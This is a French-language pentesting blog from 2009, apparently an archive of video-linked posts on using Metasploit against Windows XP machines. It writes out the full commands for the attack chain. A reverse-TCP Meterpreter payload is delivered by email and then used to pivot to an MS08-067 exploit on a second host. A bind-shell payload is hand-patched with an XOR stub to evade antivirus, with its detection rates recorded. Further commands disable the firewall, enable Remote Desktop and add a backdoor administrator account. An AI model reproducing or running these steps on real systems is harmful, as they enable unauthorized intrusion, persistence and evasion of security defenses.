dimanche 14 juin 2009

samedi 13 juin 2009

Meterpreter attack pivot [video]

meterpreter - portfwd from ne0matrix on Vimeo.



----------------------------------------------
network 1 (wifi)
R1: xx.xx.xx.xx (public IP)
NAT overload + static PAT (53, 69, 4444, 4445)
A: Laptop BT 192.168.1.8 (attacker)
----------------------------------------------
network 2
R2: NAT overload (firewall)
B: Desktop XPsp2 192.168.1.67 (target1 - pivot)
C: Laptop XPsp3 192.168.1.66 (target2)
----------------------------------------------
A ==wifi==> * R1 * ---internet--> * R2 * ==wire==> + B + ==wire==> C

----------------------------------------------
----------------------------------------------
ATTAQUE 1 (B)

Envoi par email(par ex) d'un fichier douteux (.doc-macrovba, .pdf, .jpg, etc....) qui éxécute un payload reverse tcp.

msfpayload windows/meterpreter/reverse_tcp LHOST=xx.xx.xx.xx LPORT=4444 X > reverse.exe
#pour la démonstration, on a transféré le fichier via tftp
msfconsole
use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.8
set LPORT 4444
exploit
#B éxécute reverse.exe ==> 1ere séssion meterpreter

----------------------------------------------
CONFIGURATION PIVOT sur B

portfwd add -L 127.0.0.1 -l 4445 -r 192.168.1.66 -p 445
background
route add 192.168.1.66 255.255.255.255 1
#1 étant le numéro de la séssion


----------------------------------------------
ATTAQUE 2 (C)
use windows/smb/ms08_067_netapi
set RHOST 192.168.1.66
set RPORT 445
set payload windows/meterpreter/bind_tcp
set LPORT 4445
exploit
#2e séssion meterpreter

vendredi 12 juin 2009

Execution flow hijack + XOR encryption

Execution flow hijack + XOR from ne0matrix on Vimeo.



***Based on the shmoocon demo made by Muts***

Backtrack:
msfpayload windows/shell_bind_tcp LPORT=55555 X > bindtcp.exe

Windows:
Click on the file ==> bindshell on port 55555
check: netstat -na find "55555"


PEditor
.idata: vsize:500 - rsize:400

hexedit:
+ 200 hex bytes


--------------
--OLLYdbg--
--------------

first instructions:
00401000 > 31C0 XOR EAX,EAX

00401002 68 34104000 PUSH
00401007 . 64:FF30 PUSH DWORD PTR FS:[EAX]
0040100A . 64:8920 MOV DWORD PTR FS:[EAX],ESP
0040100D . 6A 40 PUSH 40

Code cave: 00401066
start: 00401002
end: 00401060

XOR loop:
MOV EAX, 00401002 # Start of encoding address.
XOR BYTE PTR DS: [EAX], 5E # XOR the contents of EAX with the key 5E
INC EAX # Increase EAX
CMP EAX, 00401060 # Tests to see if we've reached the end of our enc
JLE SHORT xxx # If not, jump back to XOR command


After the loop:
XOR EAX,EAX (overwritten instructions)
JMP 00401002 (the address after the overwritten instructions)


------------------
Commentaires
------------------


1- Créer un payload bind_tcp
msfpayload windows/shell_bind_tcp LPORT=55555 X > bindtcp.exe (par exemple)

2- Le scanner via virustotal (résultat...)
3- Cliquer sur le payload et vérifier que le port un ouvert
netstat -na find "55555"

4- Exécuter le payload dans PEditor
-Modifier la section .idata
vsize:500 & rsize:400
Elle doit être readable, writable et executable.
-Modifier la section .text (readable, Writable et executable)
Enregistrer

5- Ouvrir le payload avec Hexedit
-Ajouter 200 hex bytes
Puisque (initial-rsize=200, actual-rsize=400 ) 400-200 ==> 200.
Enregistrer

6- Lancer le payload via Ollydbg
-Copier les 1eres instructions dans notepad (pour repérer les instructions qui seront remplacées)
-Trouver un espace libre pour le "code-cave"
-Retouner à l'OEP(entrypoint/début), remplacer la 1ere instruction par "JMP adresse-du-code-cave"
-Définir/repérer l'adresse à laquelle doit commencer l'encodage
-Définir/repérer l'adresse à laquelle doit se terminer l'encodage, et modifier la boucle ASM avec ces adresses.
-Après la boucle, introduire l'instruction (les instructions) qui a été remplacée par le JMP du début.
-Et terminer par un 2e JMP vers l'adresse [00401002] qui suit l'instruction remplacée

jeudi 21 mai 2009

samedi 16 mai 2009

Msfencode + Xor encoding ==> 15%

Fichier encodedbindtcpx.exe reçu le 2009.05.16 23:23:28 (CET)Situation actuelle: terminé
Résultat: 6/40 (15.00%)

http://www.virustotal.com/fr/analisis/2dcd8d8636d7aae5dd1ae629abcca482


xor4 from ne0matrix on Vimeo.

vendredi 15 mai 2009

msfencode vs XOR encryption

./msfpayload windows/shell_bind_tcp LPORT=55555 X > ***.exe

Fichier bindtcpx.exe reçu le 2009.05.15 20:33:46 (CET)
Situation actuelle: terminé
Résultat: 12/40 (30.00%)
http://www.virustotal.com/fr/analisis/86902b47b990be990c8dbccfd2628e49

--------------------------
Execution flow hijack ==> XOR encryption

Fichier bindtcpx1.exe reçu le 2009.05.15 20:35:25 (CET)
Situation actuelle: terminé
Résultat: 8/40 (20.00%)
http://www.virustotal.com/fr/analisis/768667c427ae3001c11dff126c54f231

--------------------------
./msfpayload windows/shell_bind_tcp LPORT=55555 R msfencode -b '' -t exe -o ***.exe

Fichier encodedbindtcp.exe reçu le 2009.05.16 23:33:49 (CET)Situation actuelle: terminé
Résultat: 10/40 (25.00%)
http://www.virustotal.com/fr/analisis/4a7e5c372c5292c0a56799ad75b10b3e


dimanche 3 mai 2009

Meterpreter Autoscript scraper.rb

scraper from ne0matrix on Vimeo.


scraper.rb on metasploit [dot] com


http://trac.metasploit.com/wiki/AutomatingMeterpreter

Remote desktop configuration

getgui from ne0matrix on Vimeo.




Getgui script:

getgui.rb on metasploit
run getgui -h


manual config:

Netstat –na find “3389”
Netsh firewall show opmode
netsh firewall set opmode mode=DISABLE
netsh firewall set opmode exception=ENABLE
netsh firewall set service type = remotedesktop mode = enable
netsh firewall set service type = remotedesktop mode = enable scope=CUSTOM 192.168.1.64


reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" find "fDenyTSConnections"

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

net user morpheus thematrix /add
net localgroup "Utilisateurs de Bureau à distance" /add"
net localgroup Administrateurs morpheus /add

lundi 27 avril 2009

Metasploit daemon - msfd I



Utility that opens the Metasploit framework for remote access. Basically turns the framework on the local machine into a server for remote machines.

Location:
/pentest/exploit/framework3

Usage:
./msfd -a -d -p

Example:
./msfd -a 192.168.1.100 -d -p 4444
[*] Initializing msfd...
[*] Running msfd...

links:
https://wiki.remote-exploit.org/backtrack/wiki/msfd
http://trac.metasploit.com/browser/framework3/trunk/msfd

Metasploit daemon - msfd II

msfd from ne0matrix on Vimeo.


This plugin provides an msf daemon interface that spawns a listener on a
defined port (default 55554) and gives each connecting client its own
console interface. These consoles all share the same framework instance.

link:
http://trac.metasploit.com/browser/framework3/trunk/plugins/msfd.rb

dimanche 26 avril 2009

Audio stream with netcat [video]

Audio stream netcat from ne0matrix on Vimeo.

Meterpreter soundrecorder [video]

meterpreter soundrecorder from ne0matrix on Vimeo.

Favorite quotations

COURAGE is not the ability to be fearless, but the ability to act in spite of fear.

Better to fight for something than to live for nothing.
(Gen. G.S. Patton)